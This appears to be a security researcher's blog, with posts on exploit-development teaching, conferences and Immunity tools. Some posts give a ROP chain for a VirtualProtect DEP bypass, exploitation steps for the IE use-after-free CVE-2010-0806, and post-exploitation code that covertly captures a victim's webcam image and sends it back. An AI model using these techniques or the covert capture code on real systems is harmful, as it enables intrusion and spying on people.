Etica Nicomana

Teaching exploit development

2011-04-26T19:06:00.000-07:00

Giving a training is one of the hardest thing you will ever experience in a researcher's life (and one of the most rewarding).
Over the 5 days we spent last week giving the Master Class, there were months spent working on the material, preparing exercises, etc.
My first thought when i did my first training back in 2004, was that it was simple. I completely master the subject i was teaching and the slide deck was pretty solid. But that was just one part of the deal, communicating the knowledge is hard and brain consuming. It's not just "explaining" a subject, but rather transferring the knowledge in such a way that is exciting, mantain the attention of the class for 8 hours a day and it's progressive.
The composition of the class is probably one of the hardest challenge. They are generally very heterogeneous, from super skilled people that should be with you teaching the class to people that are completely new to the subject. I always tell the story of my experience in Japan, where the first day I make everyone introduce themselves and tell me their experience with the heap, two out of the twenty students have no idea what the heap was, and in fact, their expertise on security was very physical: They work installing security doors.
It's really complex to maintain a balance on a class and make everyone happy, you need to be prepare with a series of exercises and even that won't starve the most hungry for knowledge, whether at the same time you need to have simple exercises and good analogies for the new ones.
The classes on exploitation are a subject by their own. An exploit is something that should not be happening on that machine, you have the whole system against you and now you are not only teaching it but helping 34 people at the same time having all kind of problems. And the worst part, you have 30 seconds to sit on his machine and understand every step of their logic to help them out.
For all of those reasons, is why we try to teach methodology over specific exploitation techniques. Bug Class die, primitive don't. And methodology have a lot to do with primitives, whether is messaging the heap layout to craft a deterministic heap or getting a infoleak out of use-after-free.
If you attend a class, and you think that you are only learning how to use a tool, pack your stuff because you just lost. You lost for one of the two reasons: They are actually just teaching you how to use a tool and nothing more or you didn't understood the concept of the class at ALL.
Tools need to be learned to understand the methodology, not because people randomly want to coopt you on the army of users, but rather because they are providing the tools to move from that point one (Of course, they are classes just focus on tools, try to avoid them). Imagine teaching a class of 34 people with completely different backgrounds about SMT Solvers and symbol execution, using SMT-lib language (lisp alike language) or leaving by themselves and the debugger of choice the hooking of very specific functions to obtain some information (You will be have people using from windbg to the most obscure debugging library, and you will have to support them and actively help them with their mistakes).
I want to share just one last anecdote, that summarize the blog post. We were working on an use-after-free exercise the second day of the class, and i just explained a type of script they had to write to hook on specific functions on mshtml.dll to dynamically find softmemleak on Elements properties. Since we were running out of time, I asked the student what they would prefer: Continue working on exploiting the bug or write the script? And Halvar answered cleverly as he usually does: "What's the difference?"

Nico

The so called Return Oriented Programming...

2010-06-21T14:21:00.000-07:00

Dear Diary,
I always hate the name Returned Oriented Programming, not because it might be an accurate name but just cause it sounds like they are reinventing the wheel once again. Paraphrasing aeschylus sometimes i think the offensive security is just bread crumbs from the great banquet of the end of the 90's hackers.
Anyway, recently I have to teach a class in Norway, the group of students was very smart which always help you push further and further. The last day, as part of our advance stack overflow class, we teach them how to write a ROP shellcode and go the next step and write their automatically tool.
Obviously, one day is not much to write your own tool, but was enough to write their shellcode which I'm proud to said it was half the size of the public exploit I saw.
Since the term start getting over-hyped, I think in a way it make it look far and harder. But thinkings of way to teach it in a class, makes me realize how simple it is. You see some exploits going for the most complicated solutions while the simple ones are shorter and more accurate sometimes.
So let me give you some hints, which are part of the Advance Stack Overflow class at Immunity:

The first step before start writing a ROP shellcode is to plan the strategy ahead, else you will be improvising in the middle of your shellcode and the consequences are going to be just ugly.

Here are some bulletpoints of what you should be thinking ahead before starting your shellcode:

Restriction Bypass
As we know, the trick behind ROP is that you are basing all your return values on one or two dlls whose base is known by you, either by an infoleak or just lack of REBASE flag.
With that in mind, you need to find out which API functions are being imported (statically or dinamically) in order to find out how you are going to bypass it.
VirtualAlloc
VirtualProtect
WriteProcessMemory
HeapCreate/HeapAlloc

There are probably a bunch more, you just need to use your imagination. A recently paper from Brett Moore, make me realize you can use the same trick too.
Let said you don't have access to any of those API functions, so as you see, the field to play with is very small, an interesting way to potentially bypass it will be by using GlobalAlloc, or any kind of heap wrapper.
When we call any of those functions with normal size, it will returns us a memory chunk. With the address of the memory chunk we can easily obtain the Heap Segment http://www.nirsoft.net/kernel_struct/vista/HEAP_SEGMENT.html (usually the LSB are zero). Once you get the Heap Segment, you can grab the address of the PHEAP from it and change the permission flag into EXECUTABLE HEAP. Then the next step will be to force a second allocation of a big size such as it's going to use VirtualAlloc and make it Executable. Voila!
Which registers we control?
a) Can we control the content to all the registers (In Immunity Debugger a good way to check it, is just to get a POP R32/RETN)
b) Exchange / Move between registers: All kind of combinations and flavour, whether is just a “MOV RA, RB” , “OR RA, RB” or “XCHG RA, RB”. And so on... Swapping with ESP is always important.
c) Register logic: Look for different types of register logic, this will allow you to later bypass bad characters restrictions. (NEG R32, etc)
Memory Access Instruction
You most likely will be doing a lot of READ / WRITE operations, thats the main point of the so called ROP.
MOV [R32], R32
MOV R32, [R32]
CPU Context
Very important to reduce the amount of dwords used, always check if there is more than just ESP pointing to the controlled buffer.

Exploiting 101

The main trick to make ROP very simple (if we can really called it a trick), is just generate a parallel stack for calling functions. The parallel stack if needs to be created on a known address (if possible, which most of the time it is, else we can use ESP itself), if you know the base address of your dll, you most of the times can calculate the address of the .data (RW) section. That's a good spot to start creating your parallel stack (There are static RW pages at the same address along all version of Windows, but that is an exercise for the readers).

In the exercise we were exploiting on class, we were able to respond to all of the questions in the strategy, we have VirtualProtect imported, all the registers could be written with whatever we want, we were able to xchg with the stack , all kind of combinations of memory READ and WRITE and finally EBP was pointing to our stack.

pop R32/ ret // All the registers
mov [ecx], eax / ret // Write to ECX
mov eax, [ecx] / ret // Read from ECX
mov [eax], ebp / ret // Write to EAX content of EBP
xchg eax, esp // Exchange eax with ESP
neg eax // To bypass character restrictions

With that combination, creating the parallel stack to call VirtualProtect on our stack was trivial:
We just need to get the address of VirtualProtect, copy into the parallel stack and start writing all the arguments of VirtualProtect in the parallel stack, for the address to “unprotect” we used the stack itself taken from EBP, the other arguments were just trivial to craft. At the end, you xchg ESP with your parallel stack that will execute VirtualProtect (with the same ret2libc trick you were using) and later jump back to the stack, this time to actually execute your shellcode.

PSEUDO RETURN ADDRESS OPCODE CODE:

POP ECX

VIRTUALPROTECT IMPORT

MOV EAX, [ECX] // EAX now holds the address of VirtualProtect
POP ECX
DATA ADDR // ECX = DATA
MOV [ECX], EAX // Paralel Stack : 0: [ VirtualProtect ]
POP EAX
DATA ADDR+8 // EAX = ADDR+8
MOV [EAX], EBP // Paralel Stack: 8 [ Address of Stack ]
POP EAX

-0x2000

NEG EAX // EAX= 0x2000 Bypassing bad characters
POP ECX
DATA + 0xC // ECX = DATA + 0xC
MOV [ECX], EAX // Paralel Stack : C: [ Size: 0x2000 ]
POP EAX
-0x40 // EAX = -0x40
NEG EAX // EAX = 0x40
POP ECX
DATA + 0xC // ECX = DATA+0xC
MOV [ECX], EAX // Paralel Stack : 0x10: [ Flag: 0x40 ]
POP ECX
DATA + 0x10 // ecx = data+0x10
POP EAX
DATA + 0x60 // eax = data+0x60
MOV [ECX], EAX // Paralel Stack : 0x14: [ OldProtect: Writeable addres in data ]
POP EAX
DATA // eax = data
XCHG EAX, ESP

At this point in code, where we change switch to a parallel stack that it will look like:

[ VirtualProtect ]
[ XXXXXXXX      ]
[ Stack addr      ]
[ 0x2000            ]
[ 0x40                ]
[ DATA +0x60   ]

When the new parallel stack get executed, it will call VirtualProtect on our stack address and later return to XXXXX (I didn't set it, but that should be your stack :)

Conclusion

Once you get shellcode execution, you should go back to your very simple primitives and try to sequence of opcode that do what you one in less step, like a combination of POP or multiple memory access. Always keep in mind that the less return addresses you have, the easy to port and make universal (?).
The lesson learned is that a rop shellcode can easily be understood and written as a series of calls, read and writes instructions.
At the end, this is nothing more than the old school return to libc, I recommend to read Pablo's 2008 presentation about DEPLIB for ideas on how to write your own ROP tool.
Sorry for the lack of images or screenshot, but i'm actually should be spending all my free time getting my research done for Blackhat.

The picture on this post was taken by Igor Siwanowicz

(A)leatory (P)ersitent (T)hreat

2010-03-26T05:01:00.000-07:00

The Random House Dictionary defines aleatory as:
2. of or pertaining to accidental causes; of luck or chance; unpredictable: an aleatory element.

I will stay with accidental causes, or just plain luck to describe the exploit that was found on the wild for the CVE-2010-0806 vulnerability a couple of weeks ago. The bug is nothing more than 0day found on the wild attached with your favourite trojan (Zeus in this case) that works against Internet Explorer 6-7.

The bug

The bug class is what we known as a use-after-free, that means that at some point some object is freed but we continue use it. A good example of this bug class on a non-browser was the 2001 globbing capabilities bug on wu-ftpd that people cleverly exploit (yes, pretty much everything was done by 2001).
In the case of CVE-2010-0806 (a.k.a. ie_peers), the bug is on an old DHTML featured called behaviours "DHTML behaviors are components that encapsulate specific functionality or behavior on a page".
The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorythm will try to do a VariantClear of the destination before using it. This will end up on a call to PlainRelease which decref the reference and clean the object.

VariantChangeTypeEx called with the same source and destination

Mark dowd, the internet security oracle already talk about those kind of potential bugs here: bh2009_dowd_smith_dewey.pdf

Pertaining to accidental causes

When i first read the chinese/russian exploit, i was thrill on how it really works. Specially since my conception of a use-after-free was:
1) free the object
2) allocate memory to fill it
3) Use it

VariantClear will decrement the reference counter or free the object

Well, my conception of a use-after-free remains the same, but the on-the-wild exploit was just relying on the mystery of heap randomness to make this exploit execute shellcode.
The exploit first do a common heap spray with shellcode and later just run the use-after-free trying to free the window object and later just wait the lord to work in mysterious ways and 1/10 times execute shellcode. This is what we called in Immunity: pray-after-free.

Exploiting
The exploitation mechanism of a use-after-free is very simple, everything that was free need to be allocated with something we control. You can use every resource you want, just be sure that whatever you are allocating, it has to be on the exact same heap.
Another important decision is what to free. The public exploit use the window global which to me looks like something that could be potentially use it before we fill it. That's why creating your own element is always recommend it.

var p = document.createElement("BODY");

Creating our own element also gave us a very good idea of the reference count of the object, instead of just looping 10 times, we just call setAttribute on the createdElement.
On the TEAROFF classes, such as the Elements returned by document.createElement it does the decref through the PlainRelease. This function has 2 dword where it cache the thunk before actually free it.
We need to do two more setAttribute, in order to take p out of the cache and call MemFree.
e.setAttribute('s', p);
e.setAttribute('s', t);
e.setAttribute('s', w); // In this VarClear call, is when it actually going to free the chunk.

The Element objects are allocated on the default heap, so our soft-memleak needs to be on the same heap. Strings are allocated through SysAllocateLen which end up on the default heap as explained by Sotirov's Heap Feng Shui but (there is always a but...) jscript String had the length as the first dword, which on our object is a vtable pointer, exactly what we want to control.

Object Chunk that need to be filled (The alerted readers will notice that the chunk is a Low Fragmentation Heap chunk).

In CANVAS exploit, we use XMLHttpRequest.open() but there are many tricks like @WTFuzz document.createElement(‘div’).className
The next step is finding the exact size of the chunk, so we can allocate our object and replace the vtable.

Bypassing DEP
Trigger the bug is trivial. Whatever function we want to call on the free object it will try to do a IDispatch->GetDispID and that will use the modified vtable. The next step for a good boyscout is to transform a function pointer execution into ret2libc. To do that we need to move a buffer we control to ESP.

GetDispID is a very interesting function:

HRESULT GetDispID( BSTR bstrName, DWORD grfdex, DISPID *pid );

As you can see from the msdn description, we have two interesting thing, first the "this" object which is usually the first thing we have pushed on the stack and we also have the bstrName, which is the function name that we want to call. Javascript is flexible enough to allow us to do:

p["CocaCola"]();

The "this" object is also under our control since it's the buffer that we use on the use-after-free.

Triggering the vulnerability. In this case, i set the bstrName as "getElement" but could be transformed into whatever we want.

Now is just a matter of finding the correct piece of code in order to pop the first or the 2nd dword from the stack.
Some ideas:

XCHG/POP/RETN
POP/POP ESP/RETN
POP ESP/POP/RETN
POP EBP/POP/LEAVE/RETN

If you are precise enough, you will have defeat randomess and will have a proper shell:

BlueHat Security Forum 2010 - Argentina

2010-03-20T12:08:00.000-07:00

Dear diary,
I'm finally back into blog writing. The main reason why I stop is pretty much everyone else reason: lack of time. Although time is still a precious asset, i found some time to write this entry.
Two days ago, Microsoft finally made BlueHat for the very first time in Argentina. It is a great honour as an Argentinian still living in the country, to have Microsoft decide that we are a strategic point to extend the conference outside the US. Andrew Cushman told me its the second time they do it outside Redmond, they have a first experience in Brussels which was a bittersweet experience, but he said they learn from that experience and they renew the hopes in Argentina.
Their strategy this time was to blend the latinamerican CSO/CTO with the researchers community. Spotting who was who, was just a simple visual exercise: Suits vs tshirt.

The kicking point to archive this almost impossible objective (The Microsoft Security team has a past of choosing high objective that they commonly archive) was a round table lead by Andrew which a bunch of well-known researchers (FX, Damian Hasse, Manuel Caballero, Rodrigo Rubira Branco, Ivan Arce, Luiz Eduardo and me) with the title "Hackers and You". The idea was great, sadly, we run out of time to discuss and expose all the different flavours from such a broad topic.
I believe there are four main points made, not only in the round table but in BlueHat in general.

o Offensive security is a key part of enterprise security. Microsoft understood this looong time ago and act greatly upon it. No matter the size of your bussiness, If you ever stop considering the offensive part of the security, you will end up without strategy and simply relying on your IDS/IPS/Firewall/AV devices, that quoting FX presentation "its a very very very *bad* idea".
o Security needs to be consider in every step of your business cycle. The Microsoft presentation were very clear on that subject.
o Hire researchers for your team and make them happy. Certifying them with theoretical exams (study/take the test/immediately forget) won't make them either happy or help them secure your network. Talk to them, research on practical training and let their creative spirit fly a bit (on controlled environments).
o Prevention is prediction. This subject briefly came from a very smart question of a conference attendee to the panel, she said "having all this new technique and tricks, seems that prevention gets old". Ivan have enough time to reply saying that prevention models can be correctly designed, which i totally agree. Prevention models became prediction models. Prediction needs not to be understand as the result of a lucky cookie but rather how the philosopher Ricoeur understand the term futurology (bad translation of the term from my part): Understanding and trying to win yards on randomness. And this is where in my opinion, offensive security help you go the extra mile along with the great researchers we have on that area, they know how to hack and help you understand current and future out of the box risks.

Finally, there was an interesting presentation by Kristen Dennesen and Anchises de Paula on the Latin American vulnerability market. I had high expectation about this presentation, because i want to see how they focus this subject having to face a more executive crowd (Pedram did a great job at the ekoparty, but that was more focused on researchers).
They did a very nice job, i have the feeling that they have at least three presentations in one, so as an attendee i was thirsty for more information on the each of them but due the lack of time they couldn't go where i want. But again, this was an executive crowd. The subject in my understanding of their presentation were: Vulnerability Market in Latin America, New security legislation and their impact on the security scene and the security threats in latinamerica.
Luckily Bluehat encourage the corridor and bar discussion, which usually allows you to talk with the presenters, exchange opinion and get the backstage information.

In summary, great conference, glad too get together with old and new friends. Kudos to Celene, Katie, Mike, Mark, Damian and Andrew for putting together such a great conference. I'll be looking for more next year.

PS: My favourite presentation was Hernan Ochoas "5 minutes to explain the 14-year old unpatched SMB bug", which was fast, fun and with great content.

PS2: Fede present a very nice draft of what is going to be our future Hackerspace in Buenos Aires, i'm in the group that is trying to push this project and we hope we can gave the big news soon.

Ekoparty 2009 was a total blast!!

2009-09-24T05:21:00.000-07:00

When i decide to write this review I know it was going to be hard to be impartial on this, but the heck with it!

Ekoparty 2009 was a total blast!! Around 500 people got together on the 17 and 18th of September in the cultural center Konex to merry, learn and party a little bit.

The conference has a really interesting line-up, some of the most respected researchers around the globe such as Moxie Morlinspike, Luis Miras, Charlie Miller, Cesar Cerrudo were given insightful and original presentations.

But that's doesn't make a conference good. What it makes this conference the best one in latin america was the venue, the people that came from different part and the level of detail and effort that the organizers invested on every single spot of the conference in order to mix the best of the two worlds: a little bit of business, a little bit of underground.

I gave a turbo talk presentation on the infamous FreeListInUse technique, explaining where it original came from, how was developed and what was the original concept behind it. But sadly it was too much information in such a small amount of time that people not familiar with exploitation couldn't get the real juice about it. Next time (H2HC), i will try to overuse metaphors to explain how things works. (I will post the slides soon)

The great privilege as a speaker, was to use the Juan Pablo's masterpiece the WOPR. He made a replica of the Wargames WOPR, which leds and the corresponding counter and on the back you had a place to set your laptop.

We set a nice stand where we had the chance to gave NOP Certifications, sadly nobody pass this time, we hope that next year we had more people playing! Also some people get to the stand to get a demo of the new internet hype, the SMBv2 exploit which we successfully gave.

As an Argentinian i couldn't be more proud for having a conference such as the Ekoparty to respresent us. It was a really nice time to get together with old friends and met new people.

From this spot, i just want to thanks Fede, Fran, Leo, Jero and Juan Pablo for the great conference they made this year!!

See you next year.
Nico
PS: You can find more pictures at: http://picasaweb.google.com/nicowow/EkoParty2009

EkoParty 2009

2009-09-13T06:07:00.001-07:00

Another exciting Ekoparty 2009 is around the corner this year and all the security jetset is hitting Ezeiza (Bs.As. Airport) this weekend.

On Monday and Tuesday, we will be throwing two trainings: Writing Windows Shellcode from the Scratch and Breaking Window.

Shellcode Writing training will be taught by Pablo Solè, and it will go from "i just run exploits" to "I can write my connectback and avoid badchars". Of course, depending on how familiar the students are with assembly, it can end in a "I`m escaping the current process by writing a fork() shellcode" or "Inject myself into another process to avoid heap corruption problems". All supported with a pretty neat django framework dave wrote to make you shellcode writing experience pretty smooth (I wish we had those back in the 90's).

The other training is a straight forward Windows Stack Overflow rated "G" by the Motion Picture Association, which means that if you are a student, network engineer, security professional, etc you can learn how to write Windows exploits in just two days and start looking at Microsoft advisory from a different focus.

On thursday the ekoparty is starting and I'm giving a presentation on "Abusing FreeListInUse", which it will be a 20 minutes turbo talk about how this technique was discovered in the first place and how can be exploited in the worst scenario. (Sadly, i won`t have much time to extend on other exploitation tricks but i might give an extended version on the H2HC in November).

Anyway, if you have plans to go send me a message or you will probably find me at Immunity`s stand on the Ekoparty.

Cheers,
Nico
PS: We will be doing the NOP Certification, so it will be a good time to prove yourself and your future employee that you can write stack overflow in less than 40 minutes :)

Exploiting the Heap Cache Allocator

2009-07-28T07:36:00.001-07:00

Finally, one of the most awaited paper of 2009 was finally released. John "hzon" McDonalds bring us a bunch of refreshing techniques on one of the less inspected structures of the heap: The Heap Cache Allocator.
Although, he doesn't constrain just to the technique, but rather make a big picture of how the heap works and the different ways to exploit it. A MUST read.
Rather than making a review, I just recommend you fully read it.

http://blogs.iss.net/archive/RequiredReading.html

The cool things about playing with big blocks, is that they are not used much so you can force a nice predictable universe for exploitation.

To celebrate the paper, we are releasing the files needed to inspect the HEAP Cache on Immunity Debugger:
http://immunityinc.com/downloads/ImmunityDebuggerUpdate.tgz

Cheers,
Nico

Book review: Gray Hat Python

2009-05-18T12:26:00.001-07:00

Dear diary,
We usually said that you can easily taught yourself python in just week, well, just add 5 more days and Justin Seitz new book "Gray Hat Python", to taught yourself how to be an python "hacker".
Don't expect this book to teach what you are not, that will be hard. But do expect that this book helps you to put your knowledge and ideas into a usable tool. That is what python is all about.
Justin is an experience reverse engineer and a tool person, I know that because I recommend him for his position at Immunity, when he was an early fun of Immunity Debugger project.
And he apply his year of experience into a book that answer the question to "What exactly do i need to learn from python to start writing my tools.
The book is well-written and direct.Through the 12 chapters, he will walk you into the concepts of debugging and fuzzing, and teach you how to write scripts to extend the capabilities of the best tool around: PyDbg, ImmunityDebugger, Sulley, IdaPython and PyEmu.
And if that wasn't all, he will go step by step into writing your own debugger in python, covering through the basic exception handling to hardware breakpoint.

I recommend this book for anyone who wants to get his hand dirty on python for the first time, either writing a tool or even an exploit, cause we always said at Immunity that exploiting is nothing more than intelligent debugging.

Peace
Nico

MEMO: Heap training

2009-04-26T05:40:00.000-07:00

Dear diary,
I'm finally back but just for a short message. Between writing exploits, developing with Kostya material for the "Windows shellcode writing" class (Check out syscan.org for more information) and living I didn't have much time left.
This small post is just to announce that i'm gonna be teaching the Heap class May 11-14 in Miami Beach (more info).
I usually try to update the material of the class, in fact, i can recall of a class which i use exactly the same material as the one before.
This time i'm going to add more information about XP/2003 bypassing specially where there is no lookaside on it (Which was the case of an exploit a week ago) and probably explain (with exercise) the FreeListInUse trick.
For the lucky of you that can make it, Nicolas Pouvesle will be explaining one of the introduced subjects.

Peace,
Nico (Waisman)

Hacking like in the movies (or how to take a picture with your webcam)

2009-04-13T18:56:00.000-07:00

Dear diary,
When you spent an amount of time diving on the heap on an exploit without any significant result, you start feeling the lack of productivity.
To avoid that feeling, i from time to time stop what i'm doing to get myself into a lame pet projects to clear my mine, in this case was tasking a picture with the webcam.
It's actual quite simple, unless you follow the CF_BITMAP path, in which case you will lost a day, until you figure out the solution is CF_DIB.
The key feature of MOSDEF is the possibility that you have to avoid touching disk or executing command, unless it's really needed, this will give a tremendous post-exploitation advantage over host based IDS. Each time i see people uploading a file and executing it, it chill my spine.
MOSDEF basically compiles a C code into process independent shellcode that gets the resolution of api functions remotely, as you might guess everything gets executed on the exploited process.
The first step to write out MOSDEF C post exploitation command, is to find out what api functions you need, in this case, to get a picture of a webcam. The first google choice was to use DirectShow, which is probably the smartest idea but translated into mosdef could be a little bit time consuming (yes, tomorrow im back to more heap). So my selection was to the capCreateCaptureWindow.
#import "remote", "avicap32.dll|capCreateCaptureWindowA" as "capCreateCaptureWindowA"

This function creates a video window (which you can obviously start hidden) and returns its handle. Based on the handle, you can send different message to either record video or take a picture.
In my case, was the second option, so i did the following:

// Create a Window and connect it to the driver
hwnd = capCreateCaptureWindowA("CANVAS", 0x40000000, 0, 0, 640, 480, proghwnd, 0);
SendMessageA(hwnd, 1024+10 ,0,0); // wm_cap_driver_connect
SendMessageA(hwnd, 1024+50 ,1,0); // wm_cap_set_preview
SendMessageA(hwnd, 1024+52 ,30,0); // set_previewrate

// Get a Frame and copy it to the clipboard
SendMessageA(hwnd, 1084,0,0); // get_frame
SendMessageA(hwnd, 1054,0,0); // wm_cap_copy copy to clipboard

You will think this is the hard part, but what it took me more time was to grab the picture out of the clipboard, since i try the to grab it as a CF_BITMAP and didn't work out as expected.
The solution was to grab it as CF_DIB which returns a memory object containg a BITMAPINFO structure and after that the actual raw image.

hbitmap = GetClipboardData( 8 ); // CF_DIB
pbih = GlobalLock( hbitmap );
pBits = pbih + 49;

hor = pbih->biWidth;
vert = pbih->biHeight;
bpp = pbih->biBitCount/8;
size = hor * vert * bpp ;

sendint(hor);
sendint(vert);
senddata2self(pBits, size);

This simply gets transformed into a small python command called "saycheese"

That after its get executed, you will get a scary face like this one inside your screenshot section

Neat, a picture is worth a thousand words, at least for your boss or your clients.
But if you are one of those owl hackers (*blink*) that wait into the deep of the night for your prey to stop using the machine so you can start downloading the 3gb database, you can rest now.
I add a small script that runs our motiondetection command, that returns the motion's percentage based on two pictures taken through the webcam (the algo is quite simple, just compare pixel by pixel to find out change).
Aside of the percentage, it returns into a neat picture showing the place where motion was found. (NOTE: Any resemblance of any character to any actual person, whether living or dead, is purely coincidental, specially with that Keanu Reeves movie).

EDIT: Juano@Netifera share his knowledge on the subject. To improve accuracy of the motion detection algo, you can take a couple of pictures and create an array based on the average pixel on each position, that will give you a decent background image to compare with.

Peace
Nico

Sean eternos los laureles...

2009-03-31T10:44:00.000-07:00

It seems like there are an irregular amount of infected computers with that Conflicter worm, the Paris Hilton of the worms, (quoting some blog i lost the url) from Argentina as this CAIDA research shows: http://www.caida.org/research/security/ms08-067/conficker.xml

Argentina stands out has having a disproportionately large number of infected IP addresses

.

Two theories:
o Either the Conflicker worm was created here (Yes, I'm talking about you)
o or their version of the MS08-067 works pretty well on Spanish windows.

If tomorrow morning, when you are reading the news, you start seeing an important amount of Maradona's pictures, you will know the correct answer.

Small tools, Big hearts: A guide to Caring for your little tool

2009-03-30T11:36:00.000-07:00

Dear Diary,
Bas always says that exploiting is nothing more than intelligent debugging. I agree, specially because I have probably a couple of weeks ahead schedule for more debugging...

So if that your case too, let me give you a hand:

Let said, you are planning your heap primitive. These days, you have to aim for something like the Lookaside single-list pointer, the Bitmask trick (a.k.a. a free chunk < 1024 and the only entry of that freelist or just a free chunk) or any other of the Brett Moore tricks.

The point is, that you need a special heap layout so when the actual overwrite happens, you modify exactly the chunk you plan to. That takes a lot of time, brain cells and a basket of try-error.
To help you reduce time, we wrote this simple hook script, that has been on ID for years:

!chunkanalizehook -a ADDRESS (exp)
ADDRESS of the place where you want to set a hook
(exp) expression to calculate the chunk address

The basic idea is, you set the script on the code address exactly before the actual overwrite is going to happen, and this will automatically dump you the chunk given by the "expression" argument and the next couple of chunks.
For example, let say you have this piece of code:

402020: MOV EDI,DWORD PTR DS:[EAX]
402022: SHR ECX,2
402025: REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]

When eip points to the opcode 402022, EDI will be the overwriting chunk data. So what you have to is set chunkanalize at the beggining of that chunk

!chunkanalizehook -a 0x402022 EDI - 0x8

And you can now run your exploit, each time that opcode gets executed, you will see on Immunity Debugger Log Window (Alt+L), the heap dump:

034CBC58 > Hit Hook 0x00402022, checking chunk: 0x034cbc58
===============================================
0x034cbc58> size: 0x00000520 (00a4) prevsize: 0x00000050 (000a)
heap: *0x00000000* flags: 0x00000001 (B)
0x034cc178> size: 0x00000410 (0082) prevsize: 0x00000520 (00a4)
heap: *0x00000000* flags: 0x00000000 (F)
next: 0x035fd930 prev: 0x034c0178
0x034cc588> size: 0x000002a8 (0055) prevsize: 0x00000410 (0082)
heap: *0x00000000* flags: 0x00000001 (B)

The first chunk is the overwritting chunk, the second one the one that soon is gonna get modified.
Seems I'm not lucky yet, hopefully you are

Peace,
Nico
PS: Take a look at the python script (PyCommands folder), it can be improved quite easily!

Technical trainings: The good, the bad, the weird.

2009-03-26T13:54:00.000-07:00

Dear Diary,
I'm back in Buenos Aires again, enjoying the end of the summer. The training madness is over, until next May where i'm back with the heap overflow class.
Don't get me wrong, teaching is my favourite task at Immunity and out of it (Next week I'm gonna start as a teacher assistant on the subject "Ethics" on a local university. Greek tragedy is what I will be explaining). But the true is that training takes a lot from you, and at the same time it gives you so much.
My favourite part is in day two, when everything start making sense and you can see people really enjoying each exercise when they put all the pieces together.

The japanese training was amazing, I couldn't enjoy it more. The class was funny and entraining, one of the guys at the beginning of the class introduce himself as Shoichi Nakagawa, Japan's minister of finance who gave a press conference drunk.

The only big problem that i had was obviously the language. I got two girls translating, but it wasn't simultaneous so I have to make a pause on each phrase so its get translate.
The trick I pull to make it more dynamic, was to make a random student who finish the exercise explain what he did and why in the projector computer. It was a win-win situation, students got a second explanation in Japanese while the selected student explanation help him understand the subject even more deeply by being able to teach it.
People there were quite nice, we had pizza and some drinks on the first day, and at some point everyone got in a circle and start giving a small speech of who they were and what they expected for the class. I wish I can do that on every class!
I guess the main problem that i had with languages, was not to be able to listen to what students talk between each other, that's usually a key factor of a class, because it allows me to identify levels and gave different exercise upon it.

Japan itself was amazing, and I want to thanks on the website to the people from cyberdefense (Jack-san, Lauri-san, Yusuke-san and Matsumoto-san) for the big hand they gave me on the training.

They also took us to a traditional salaryman restaurant near Akihabara, where we try different types of local dishes and the freshest sushi i ever try. (yes, all the fishes in the picture were alive).

Going back to the training, I went back from Japan to Buenos Aires, only to stay two days and then back to Miami to give two more training with my dearest friend Kostya Kortchinsky. Those training were pretty good and we got quite an amount of really skilled students, it was a real surprise to see everyone at the same level!
Back in the airport, waiting for my flight back to Buenos Aires, i put together a list of rules (or tips) that i had being collecting over the years:

o Never ever ever never start compiling and fixing stuff in the middle of the class (only like 10 minutes max is allowed).
o Don't look insecure
o Be comfortable with your material, remember to read it and know exactly what is comming next. It's really common to get excited and start explaining stuff that might appear later.
o Always tell war stories.
o Most difficult task: Be prepare for the most advanced student and for the most inexperienced.
o Don't spent your entire class on the slow students: Try to push him, help them as much as possible, but don't loose the track of the class. You request at the beginning of the class for basic requirements that is the student responsibility to get before class.
o Always bring extra exercises.
o Real life examples is always a win. People enjoy owning a real server vs your exercise server.
o Improvization is good and people will appreciate it, only when your material is solid.
o Not knowing the answer of all the question is ok. You are not god neither Kostya.
o Exercise, Exercise and more Exercise. Always support your material with hand-ons exercise.
o Students love owning stuff, if they can archive shellcode execution they will be happy++. The satisfaction of writing a workable exploit is priceless, even tho is on your "hoolio" server.
o Be progressive with your exercise. Each exercise has to teach at least one new thing or introduce a new challenge.
o One, two even three challenges are ok per exercise, but try not overwhelm the students.

Peace,
Nico

no more free bugs?

2009-03-20T19:07:00.000-07:00

It is me or this "no more free bugs" movement is as old as Methuselah?
I think the real challenge would be "no more pennys for bugs".

Nico
PS: Does fame count as money? Cause i had seen a lot of bugs paid with that currency.

If you are doing your homework correctly, you will get... (II)

2009-02-10T14:47:00.001-08:00

Dear Diary,
Tokyo's Trainning is next week, and I just finished writing the last exercise for day 3. If you did it correctly, your Visualsploit would look like figure above.
The exercise is for Windows 2003, and the objective is to exploit the heap overwriting a Lookaside pointer. The options were, I made my own server or the students have to install Citrix 4.5 to own Brett Moore bug ;)
After the lookaside trick, it will be pulling a HEAP to Stack trick, and finishing with a ret2libc to disable DEP protection.
Learning how to exploit the heap correctly is like learning programming, once you learn how to code in C you can do it on everything else.
The C of heap learning is Windows 2000 Exploitation. Once you master the way to control the heap, predict how it's gonna look and diagnose a crash without looking at code, you are ready for everything else (And that's pretty much include other SO heaps).
That's the real extra value of this class, and that is why the first day of class is so hard.

In other news, someone wrote a paper on format string using Immunity Debugger http://milw0rm.com/papers/282.

Cheers,
Nico
PS: Tomorrow I have tickets for Peter Murphy for the first time in Buenos Aires. I'm so getting a Bauhaus tshirt.

MOSDEF 2.0 is out!

2009-02-05T06:42:00.000-08:00

Dear Diary,
MOSDEF 2.0 is out, let's the hype begging...
Wait...
Were is all the cheering?
Do we need to coordinate with a lot of vendors to make it cool?
Ah, or probably announce it secretly teasing everyone of something that it doesn't do?

The interweb had change quite a lot lately...

Anyways, MOSDEF v2.0 a LGPL C-like compiler written in python is out. And it's incredible fast.
Why you will be using it? Because if fun, because it's simple to use and practical.
Other than using the usual compiler capabilities, you can use MOSDEF inside your exploit for shellcode. Rather than the usual stolen string shellcode, you can now write your own by do doing:
from MOSDEF import mosdef
mosdef.assemble("jmp %ebx", "X86") # or "PPC"

Simple and useful. But this is like the most simple thing you can do with it, there is a huge world of things you can no do.
I would love to see people start doing their own packers/polymorphic shellcode over MOSDEF.

The compiler chain works this way (stolen from rich's pdf):
cc.py -> cpp.py -> cparse2.py -> il2X86.py -> x86parse.py -> makeexe.py

If you want to see the mechanic of the compiler, you probably want to take a look at the first three files, but what we really gonna care for any cool new tool is the last 3 files:

il2X86.py takes a really simple to understand Intermediate Language, and transform it into assembly. Let's see some examples:

def _loadint(self, words):
return ["movl $%d,%%eax\n" % long(words[1],0)]

def _call(self, words):
return ["call %s\n"%words[1]]

def _subconst(self, words):
